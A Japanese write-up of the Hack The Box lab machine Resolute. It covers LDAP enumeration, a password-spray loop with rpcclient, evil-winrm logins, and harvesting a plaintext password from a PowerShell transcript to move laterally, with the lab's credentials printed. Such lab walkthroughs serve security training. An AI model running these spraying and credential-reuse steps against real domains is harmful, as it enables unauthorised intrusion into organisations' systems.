🌟

Resolute_HTB

2024/01/03に公開

概要

  • Resolute は、Active Directory を備えた簡単な難易度の Windows マシンです。
  • Active Directory の匿名バインドは、システム管理者が新しいユーザー アカウントに設定したパスワードを取得するために使用される。
    • そのアカウントのパスワードはその後変更されているようです。
    • パスワード スプレーにより、このパスワードが別のドメイン ユーザー アカウントでまだ使用されていることがわかり、WinRM 経由でシステムにアクセスできるようになります。
  • コマンドラインで渡された資格情報をキャプチャした PowerShell トランスクリプト ログが検出されます。
    • これは、DnsAdmins グループのメンバーであるユーザーに横方向に移動するために使用されます。
    • このグループには、DNS サーバー サービスがプラグイン DLL をロードするように指定する機能があります。
    • DNS サービスを再起動した後、NT_AUTHORITY\SYSTEM のコンテキストでドメイン コントローラー上でコマンドを実行します。

SCAN

nmap

┌──(kali㉿kali)-[~]
└─$ nmap -sV -Pn -T4 10.10.10.169
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-02 20:40 EST
Nmap scan report for 10.10.10.169
Host is up (0.33s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 01:49:12Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.11 seconds
  • 評価
    • Domain: megabank.local
      • Domain名が判明したのでldapに対する攻撃ができそう
    • Microsoft Windows Server 2008
      • 古いからnopacも行けそう

winldap

  • insatll
┌──(kali㉿kali)-[~/Resolute]
└─$ git clone https://github.com/ropnop/windapsearch.git
Cloning into 'windapsearch'...
remote: Enumerating objects: 83, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 83 (delta 0), reused 0 (delta 0), pack-reused 69
Receiving objects: 100% (83/83), 44.61 KiB | 1.65 MiB/s, done.
Resolving deltas: 100% (48/48), done.
  • そのままでは動かないためREADMEに書いてある通り行うが動かず
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ pip install python-ldap
Defaulting to user installation because normal site-packages is not writeable
Collecting python-ldap
  Downloading python-ldap-3.4.4.tar.gz (377 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 1.0 MB/s eta 0:00:00
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
  Building wheel for python-ldap (pyproject.toml) ... error
  error: subprocess-exited-with-error
  
  × Building wheel for python-ldap (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [83 lines of output]
      running bdist_wheel
      running build
      running build_py
      creating build
      creating build/lib.linux-x86_64-cpython-311
      copying Lib/ldapurl.py -> build/lib.linux-x86_64-cpython-311
      copying Lib/ldif.py -> build/lib.linux-x86_64-cpython-311
      creating build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/compat.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/constants.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/functions.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/logger.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/sasl.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/cidict.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/pkginfo.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/dn.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/filter.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/async.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/modlist.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/resiter.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/syncrepl.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/asyncsearch.py -> build/lib.linux-x86_64-cpython-311/ldap
      copying Lib/ldap/ldapobject.py -> build/lib.linux-x86_64-cpython-311/ldap
      creating build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/deref.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/ppolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/psearch.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/sss.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/pagedresults.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/sessiontrack.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/libldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/readentry.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/pwdpolicy.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/vlv.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/simple.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      copying Lib/ldap/controls/openldap.py -> build/lib.linux-x86_64-cpython-311/ldap/controls
      creating build/lib.linux-x86_64-cpython-311/ldap/extop
      copying Lib/ldap/extop/dds.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
      copying Lib/ldap/extop/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
      copying Lib/ldap/extop/passwd.py -> build/lib.linux-x86_64-cpython-311/ldap/extop
      creating build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/__init__.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/models.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/tokenizer.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      copying Lib/ldap/schema/subentry.py -> build/lib.linux-x86_64-cpython-311/ldap/schema
      creating build/lib.linux-x86_64-cpython-311/slapdtest
      copying Lib/slapdtest/_slapdtest.py -> build/lib.linux-x86_64-cpython-311/slapdtest
      copying Lib/slapdtest/__init__.py -> build/lib.linux-x86_64-cpython-311/slapdtest
      running egg_info
      writing Lib/python_ldap.egg-info/PKG-INFO
      writing dependency_links to Lib/python_ldap.egg-info/dependency_links.txt
      writing requirements to Lib/python_ldap.egg-info/requires.txt
      writing top-level names to Lib/python_ldap.egg-info/top_level.txt
      reading manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
      reading manifest template 'MANIFEST.in'
      no previously-included directories found matching 'Doc/.build'
      adding license file 'LICENCE'
      writing manifest file 'Lib/python_ldap.egg-info/SOURCES.txt'
      creating build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/README -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/ca.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/ca.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/client.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/client.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/client.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/gencerts.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/gennssdb.sh -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/server.conf -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/server.key -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      copying Lib/slapdtest/certs/server.pem -> build/lib.linux-x86_64-cpython-311/slapdtest/certs
      running build_ext
      building '_ldap' extension
      creating build/temp.linux-x86_64-cpython-311
      creating build/temp.linux-x86_64-cpython-311/Modules
      x86_64-linux-gnu-gcc -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -fPIC -DHAVE_SASL -DHAVE_TLS -DLDAPMODULE_VERSION=3.4.4 "-DLDAPMODULE_AUTHOR=python-ldap project" "-DLDAPMODULE_LICENSE=Python style" -IModules -I/usr/include/python3.11 -c Modules/LDAPObject.c -o build/temp.linux-x86_64-cpython-311/Modules/LDAPObject.o
      In file included from Modules/LDAPObject.c:3:
      Modules/common.h:15:10: fatal error: lber.h: No such file or directory
         15 | #include <lber.h>
            |          ^~~~~~~~
      compilation terminated.
      error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for python-ldap
Failed to build python-ldap                                       
ERROR: Could not build wheels for python-ldap, which is required to install pyproject.toml-based projects                           
                                                                  
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip install python-ldap
Collecting python-ldap
  Downloading python-ldap-3.4.4.tar.gz (377 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━ 377.9/377.9 kB 3.1 MB/s eta 0:00:00
  Installing build dependencies ... done
^C  Getting requirements to build wheel ... canceled
ERROR: Operation cancelled by user
  • libsasl2-devをapt-getすることでうまくいく
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo apt-get install libsasl2-dev

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following package was automatically installed and is no longer required:
  libaio1
Use 'sudo apt autoremove' to remove it.
The following additional packages will be installed:
  libsasl2-2 libsasl2-modules libsasl2-modules-db libssl-dev
  libssl3 openssl
Suggested packages:
  libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal
  libsasl2-modules-ldap libsasl2-modules-otp
  libsasl2-modules-sql libssl-doc
The following NEW packages will be installed:
  libsasl2-dev libssl-dev
The following packages will be upgraded:
  libsasl2-2 libsasl2-modules libsasl2-modules-db libssl3
  openssl
5 upgraded, 2 newly installed, 0 to remove and 1550 not upgraded.
Need to get 6,235 kB of archives.
After this operation, 13.7 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules-db amd64 2.1.28+dfsg1-4 [19.4 kB]
Get:2 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling/main amd64 libssl3 amd64 3.0.11-1 [2,016 kB]
Get:3 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-2 amd64 2.1.28+dfsg1-4 [56.7 kB]
Get:4 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 libssl-dev amd64 3.0.11-1 [2,431 kB]
Get:6 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-modules amd64 2.1.28+dfsg1-4 [65.8 kB]
Get:7 http://ftp-srv2.kddilabs.jp/Linux/packages/kali/kali kali-rolling/main amd64 openssl amd64 3.0.11-1 [1,416 kB]
Get:5 http://http.kali.org/kali kali-rolling/main amd64 libsasl2-dev amd64 2.1.28+dfsg1-4 [230 kB]
Fetched 6,235 kB in 4s (1,732 kB/s)   
(Reading database ... 420821 files and directories currently installed.)
Preparing to unpack .../0-libsasl2-modules-db_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../1-libssl3_3.0.11-1_amd64.deb ...
Unpacking libssl3:amd64 (3.0.11-1) over (3.0.8-1) ...
Preparing to unpack .../2-libsasl2-2_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-2:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Selecting previously unselected package libssl-dev:amd64.
Preparing to unpack .../3-libssl-dev_3.0.11-1_amd64.deb ...
Unpacking libssl-dev:amd64 (3.0.11-1) ...
Selecting previously unselected package libsasl2-dev.
Preparing to unpack .../4-libsasl2-dev_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-dev (2.1.28+dfsg1-4) ...
Preparing to unpack .../5-libsasl2-modules_2.1.28+dfsg1-4_amd64.deb ...
Unpacking libsasl2-modules:amd64 (2.1.28+dfsg1-4) over (2.1.28+dfsg-10) ...
Preparing to unpack .../6-openssl_3.0.11-1_amd64.deb ...
Unpacking openssl (3.0.11-1) over (3.0.8-1) ...
Setting up libssl3:amd64 (3.0.11-1) ...
Setting up libsasl2-modules-db:amd64 (2.1.28+dfsg1-4) ...
Setting up libssl-dev:amd64 (3.0.11-1) ...
Setting up libsasl2-2:amd64 (2.1.28+dfsg1-4) ...
Setting up openssl (3.0.11-1) ...
Installing new version of config file /etc/ssl/openssl.cnf.original ...
Setting up libsasl2-modules:amd64 (2.1.28+dfsg1-4) ...
Setting up libsasl2-dev (2.1.28+dfsg1-4) ...
Processing triggers for libc-bin (2.36-9) ...
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for kali-menu (2023.2.3) ...
Scanning processes...                                             
Scanning candidates...                                            
Scanning linux images...                                          

Running kernel seems to be up-to-date.

Restarting services...
 /etc/needrestart/restart.d/systemd-manager
 systemctl restart open-vm-tools.service systemd-journald.service systemd-udevd.service udisks2.service
Service restarts being deferred:
 systemctl restart NetworkManager.service
 /etc/needrestart/restart.d/dbus.service
 systemctl restart docker.service
 systemctl restart lightdm.service
 systemctl restart systemd-logind.service

No containers need to be restarted.

User sessions running outdated binaries:
 kali @ session #2: firefox-esr[35968], lightdm[1251],
  qterminal[1986], vmtoolsd[1601], xfce4-panel[1444],
  xfce4-session[1287]
 kali @ user manager service: at-spi-bus-laun[1368],
  systemd[1257]

No VM guests are running outdated hypervisor (qemu) binaries on
 this host.
                                                                  
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ sudo pip3 install python-ldap    
Collecting python-ldap
  Using cached python-ldap-3.4.4.tar.gz (377 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: pyasn1>=0.3.7 in /usr/lib/python3/dist-packages (from python-ldap) (0.4.8)
Requirement already satisfied: pyasn1-modules>=0.1.5 in /usr/lib/python3/dist-packages (from python-ldap) (0.2.8)
Building wheels for collected packages: python-ldap
  Building wheel for python-ldap (pyproject.toml) ... done
  Created wheel for python-ldap: filename=python_ldap-3.4.4-cp311-cp311-linux_x86_64.whl size=369623 sha256=bb454d67a738df7c7910dc2d21a0eadf1a0e14ba58094ae4152d8d0a57a3bff1
  Stored in directory: /root/.cache/pip/wheels/72/59/42/74cab8c1fe6e14c49959206b24b0f87697351eea2ac9787401
Successfully built python-ldap
Installing collected packages: python-ldap
Successfully installed python-ldap-3.4.4
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv
  • winldapsearchを使用した情報収集
┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U > Users

┌──(kali㉿kali)-[~/Resolute/windapsearch]
└─$ ./windapsearch.py -d megabank.local --dc-ip 10.10.10.169 -U --full | grep Password
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
description: Account created. Password set to Welcome123!
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
badPasswordTime: 0
  • test.sh作成
┌──(kali㉿kali)-[~/Resolute]
└─$ cat test.sh 
# /bin/bash
for u in $(cat ./users | awk -F@ '{print $1}' | awk -F: '{print $2}');
do
        rpcclient -U "$u%Welcome123!" -c "getusername;quit" 10.10.10.169 | grep Authority;
done
  • 実行
┌──(kali㉿kali)-[~/Resolute]
└─$ ./test.sh    
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Account Name: melanie, Authority Name: MEGABANK
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Initial Access

┌──(kali㉿kali)-[~/Resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                               
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion               
                                        
Info: Establishing connection to remote endpoint

横展開先の情報収集

*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===============================================
megabank\melanie S-1-5-21-1392959593-3013219662-3596683436-10101


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-         1/2/2024   5:47 PM      402653184 pagefile.sys


*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\Users\melanie\Desktop> dir -force c:\PSTranscripts\20191203


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> gc c:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\Users\melanie\Desktop>
  • 評価
    • PowerShellの履歴からnet useコマンドの形跡を確認
      • これをつかって横展開できそう

横展開

──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>

